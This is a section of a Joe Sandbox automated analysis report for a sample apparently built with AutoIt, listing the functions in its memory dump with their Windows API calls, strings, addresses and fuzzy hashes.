Function 0096ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0096ED2A
_wcslen.LIBCMT ref: 0096ED3B
_wcslen.LIBCMT ref: 0096ED79
_wcslen.LIBCMT ref: 0096EDAF
_wcslen.LIBCMT ref: 0096EDDF
_wcslen.LIBCMT ref: 0096EDEF
_wcslen.LIBCMT ref: 0096EE2B
_wcslen.LIBCMT ref: 0096EE5A

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 9d4b59020c3a3d687b16283334b9cada2c2afb1f4ab1241c21820ec38e0f030d
Instruction ID: c691d007c734d142219e753e543ed70537bcd3017e07db1e8e206f0c90fee068
Opcode Fuzzy Hash: 9d4b59020c3a3d687b16283334b9cada2c2afb1f4ab1241c21820ec38e0f030d
Instruction Fuzzy Hash: 4441A669C10128B5CB11EBF4DC8AACFB7ACAF85710F508462F528E3125FB34E255C7A5

Function 0091F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0095682C,00000004,00000000,00000000), ref: 0091F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0095682C,00000004,00000000,00000000), ref: 0095F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0095682C,00000004,00000000,00000000), ref: 0095F454

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 8d508ec58e3a12aa8f78440874cfddf0260aa4ca6025438d762085e95f5888b1
Instruction ID: 62634f5465255e85827c2cdd81c695b561a78ba1523420fb691ce375364d15f9
Opcode Fuzzy Hash: 8d508ec58e3a12aa8f78440874cfddf0260aa4ca6025438d762085e95f5888b1
Instruction Fuzzy Hash: 6A416A3130C68CBAC738EF2D88B87AA7B99AB46370F58443DE44752560C635A8C5DB10

Function 00992D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00992D1B
GetDC.USER32(00000000), ref: 00992D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00992D2E
ReleaseDC.USER32(00000000,00000000), ref: 00992D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00992D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00992D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00995A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00992DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00992DE1

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 87915f361d96aa5d2878601171cce25016c3b96ed74facf9b73bbac097e4f85d
Instruction ID: d69b427aaa822acccefd2810335db7bbaa5f332938fee2526bc6d34b85fc4962
Opcode Fuzzy Hash: 87915f361d96aa5d2878601171cce25016c3b96ed74facf9b73bbac097e4f85d
Instruction Fuzzy Hash: 463169B2215214BBEF218F588C8AFEB3BADEB09715F044056FE089A291C6759C50CBB4

Function 00965622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00965637
_memcmp.LIBVCRUNTIME ref: 00965659
_memcmp.LIBVCRUNTIME ref: 00965671
_memcmp.LIBVCRUNTIME ref: 00965684
_memcmp.LIBVCRUNTIME ref: 0096569E
_memcmp.LIBVCRUNTIME ref: 009656B1
_memcmp.LIBVCRUNTIME ref: 009656C9
_memcmp.LIBVCRUNTIME ref: 009656E4

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: f966e25acf27d370094ac8d4aa4b9997dd32e76cccf204801154d98f338aafa9
Instruction ID: a64753848c2f1d296d45d1f16a2d33b286f701762451fac168c8b43201c9cc0e
Opcode Fuzzy Hash: f966e25acf27d370094ac8d4aa4b9997dd32e76cccf204801154d98f338aafa9
Instruction Fuzzy Hash: 3921C661640A197BDA149A24EE92FFA735DAFB0398F458020FD04EA685F725ED30C1A5

Function 00984FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0098502E, 00985383
Not an Object type, xrefs: 00985007

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 52e0565f5ddaab900d40fae2c4fb628900dec3f75ebcad2d95aa3177dacd5776
Instruction ID: 71c74aed85894f6892fc6fec7d6c37103cde8564a427ff60f26707bd189cc5b0
Opcode Fuzzy Hash: 52e0565f5ddaab900d40fae2c4fb628900dec3f75ebcad2d95aa3177dacd5776
Instruction Fuzzy Hash: FAD1B275A0060A9FDF10EF98C885FAEB7B9BF88344F158469E915AB380E770DD49CB50

Function 00941522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,009417FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 009415CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00941651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,009417FB,?,009417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009416E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009416FB

Part of subcall function 00933820: RtlAllocateHeap.NTDLL(00000000,?,009D1444,?,0091FDF5,?,?,0090A976,00000010,009D1440,009013FC,?,009013C6,?,00901129), ref: 00933852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,009417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00941777
__freea.LIBCMT ref: 009417A2
__freea.LIBCMT ref: 009417AE

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 1308de1ad360898fef4a7485e37f50569502201049e9af60d5d4ff328e952147
Instruction ID: 3280eae4378ec746b50e49c7bf3f178531604734987eccf1400fa18ea71fea98
Opcode Fuzzy Hash: 1308de1ad360898fef4a7485e37f50569502201049e9af60d5d4ff328e952147
Instruction Fuzzy Hash: 6891A371E102169ADF208E74CC91EEE7BB9AF89750F184659F805E7151E735DDC0CBA0

Function 00984523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00984648
VariantInit.OLEAUT32(?), ref: 00984749
VariantClear.OLEAUT32(?), ref: 00984753
VariantClear.OLEAUT32(?), ref: 009847B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0098472C
Null Object assignment in FOR..IN loop, xrefs: 009845D8, 00984706, 009847BE

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 5a21b611c7720790c3eddadfa2364c3aa066600751b7f797dc73029468890b36
Instruction ID: 16e25ff61129ffec94648bcf90dd94ad785df8fb7e97b8b66e6b02e1555fb552
Opcode Fuzzy Hash: 5a21b611c7720790c3eddadfa2364c3aa066600751b7f797dc73029468890b36
Instruction Fuzzy Hash: B9916E71A0021AAFDF20DFA5CC44FAEBBB8EF86714F108559F515AB280D7749945CFA0

Function 00971187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0097125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00971284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 009712A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009712D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0097135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009713C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00971430

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: bb0da8fa73be6e378a6aad24a33c17afccf7c427c9a40b85a1e00d9d65668f79
Instruction ID: ba553b13ea51a8159128af89be7e8fef087d17f8473df53ef15ad3bba65f46e8
Opcode Fuzzy Hash: bb0da8fa73be6e378a6aad24a33c17afccf7c427c9a40b85a1e00d9d65668f79
Instruction Fuzzy Hash: C9911672A00209AFDB00DF9CC885BBE77B9FF85311F148429E954EB2A2D774E941CB90

Function 0091948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: d33820dae3625cad902801a3c53664aa7f72123c0fd224682f4c2a4bfb0eaf7f
Instruction ID: a2ef222688d819e74c87b623551e7087b746438445e5e608a9e7b2f2458f8128
Opcode Fuzzy Hash: d33820dae3625cad902801a3c53664aa7f72123c0fd224682f4c2a4bfb0eaf7f
Instruction Fuzzy Hash: 45914971E04219EFCB11CFA9CC84AEEBBB9FF49320F148455E915B7251D378AA81CB60

Function 00983947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0098396B
CharUpperBuffW.USER32(?,?), ref: 00983A7A
_wcslen.LIBCMT ref: 00983A8A
VariantClear.OLEAUT32(?), ref: 00983C1F

Part of subcall function 00970CDF: VariantInit.OLEAUT32(00000000), ref: 00970D1F
Part of subcall function 00970CDF: VariantCopy.OLEAUT32(?,?), ref: 00970D28
Part of subcall function 00970CDF: VariantClear.OLEAUT32(?), ref: 00970D34

Strings

AUTOIT.ERROR, xrefs: 00983A80, 00983A85
Incorrect Parameter format, xrefs: 009839A6, 00983BA1

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 83a3e5229ba2088d6859cf3957cc80bff12b79002b0944f3de66c2cb1926e8a7
Instruction ID: 800b73699c5c184894f6aa8d7d68a6e62010c435e909e91e9775b174dafb2b95
Opcode Fuzzy Hash: 83a3e5229ba2088d6859cf3957cc80bff12b79002b0944f3de66c2cb1926e8a7
Instruction Fuzzy Hash: F59137756083059FC704EF68C480A6AB7E9BF88714F14892DF8899B391DB31EE45CB92

Function 00984BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0096000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0095FF41,80070057,?,?,?,0096035E), ref: 0096002B
Part of subcall function 0096000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0095FF41,80070057,?,?), ref: 00960046
Part of subcall function 0096000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0095FF41,80070057,?,?), ref: 00960054
Part of subcall function 0096000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0095FF41,80070057,?), ref: 00960064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00984C51
_wcslen.LIBCMT ref: 00984D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00984DCF
CoTaskMemFree.OLE32(?), ref: 00984DDA

Strings

NULL Pointer assignment, xrefs: 00984E23, 00984E52

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 886db35e83954d07c37703b00669253b4134de539c9a37cf44a41d39160d4dee
Instruction ID: bcd2777e863e28fcca3a8bb9f405d5553bb8bc281d913b39c10109869c2f7cfc
Opcode Fuzzy Hash: 886db35e83954d07c37703b00669253b4134de539c9a37cf44a41d39160d4dee
Instruction Fuzzy Hash: EE911971D0021DAFDF14EFA4DC91AEEB7B8BF48314F108569E915A7291DB349A44CFA0

Function 009920FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00992183
GetMenuItemCount.USER32(00000000), ref: 009921B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009921DD
_wcslen.LIBCMT ref: 00992213
GetMenuItemID.USER32(?,?), ref: 0099224D
GetSubMenu.USER32(?,?), ref: 0099225B

Part of subcall function 00963A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00963A57
Part of subcall function 00963A3D: GetCurrentThreadId.KERNEL32 ref: 00963A5E
Part of subcall function 00963A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009625B3), ref: 00963A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009922E3

Part of subcall function 0096E97B: Sleep.KERNEL32 ref: 0096E9F3

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: f0a291d557f007ce3ca2e1cc1c057a3f3a580a06d4d136cb0c1357900744e557
Instruction ID: ba2f73cd003731764f191b50c8eaa8ced7585acc930214d6a88436908833b648
Opcode Fuzzy Hash: f0a291d557f007ce3ca2e1cc1c057a3f3a580a06d4d136cb0c1357900744e557
Instruction Fuzzy Hash: C4715E75A04215AFCF14EFA8C845AAEB7F5EF88320F148459E926EB351DB34ED418B90

Function 00997E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(016756E8), ref: 00997F37
IsWindowEnabled.USER32(016756E8), ref: 00997F43
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0099801E
SendMessageW.USER32(016756E8,000000B0,?,?), ref: 00998051
IsDlgButtonChecked.USER32(?,?), ref: 00998089
GetWindowLongW.USER32(016756E8,000000EC), ref: 009980AB
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009980C3

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 4325f04b7d5d7ca4fb49cae3a1e1f5990785e8e2ff2c70a9d9391023d69687ed
Instruction ID: 9d5e544ac33ca675aff58bcdf086c76c9eb4fcf6d92d0eb363f3d5ef9e89c9c7
Opcode Fuzzy Hash: 4325f04b7d5d7ca4fb49cae3a1e1f5990785e8e2ff2c70a9d9391023d69687ed
Instruction Fuzzy Hash: 66719175618204AFEF219F98CC94FFABBB9EF5A300F14445AF94567261CB31AC45DB20

Function 0096AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0096AEF9
GetKeyboardState.USER32(?), ref: 0096AF0E
SetKeyboardState.USER32(?), ref: 0096AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0096AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0096AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0096AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0096B020

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 5e40d2594b4eba27cbcb8f08e3b7a841f25a1e0b330d2777bc2a23889a8f9879
Instruction ID: 7de1a567f2b0aa73420962249ed4e3a4235837a9c6e3a0962b46a323cfb75b38
Opcode Fuzzy Hash: 5e40d2594b4eba27cbcb8f08e3b7a841f25a1e0b330d2777bc2a23889a8f9879
Instruction Fuzzy Hash: 7251D4A0A147D53DFB3682348C45BBABEED5B06304F088589F1E9A54C3D3E9ACC4DB52

Function 0096ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0096AD19
GetKeyboardState.USER32(?), ref: 0096AD2E
SetKeyboardState.USER32(?), ref: 0096AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0096ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0096ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0096AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0096AE38

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: c8281a8a86da36f03a85c65ecd43f7a1154030d32dc4f35de6d621b4081b9ed3
Instruction ID: 9748c0cf50ff550f9f87a3166ed1df5d6452636c6082594bcf03e85519154eab
Opcode Fuzzy Hash: c8281a8a86da36f03a85c65ecd43f7a1154030d32dc4f35de6d621b4081b9ed3
Instruction Fuzzy Hash: C051E8A16047D53DFB3783348C95B7A7EEC5B45300F088489E1D5668C3D395EC84EB52

Function 0093542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00943CD6,?,?,?,?,?,?,?,?,00935BA3,?,?,00943CD6,?,?), ref: 00935470
__fassign.LIBCMT ref: 009354EB
__fassign.LIBCMT ref: 00935506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00943CD6,00000005,00000000,00000000), ref: 0093552C
WriteFile.KERNEL32(?,00943CD6,00000000,00935BA3,00000000,?,?,?,?,?,?,?,?,?,00935BA3,?), ref: 0093554B
WriteFile.KERNEL32(?,?,00000001,00935BA3,00000000,?,?,?,?,?,?,?,?,?,00935BA3,?), ref: 00935584

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
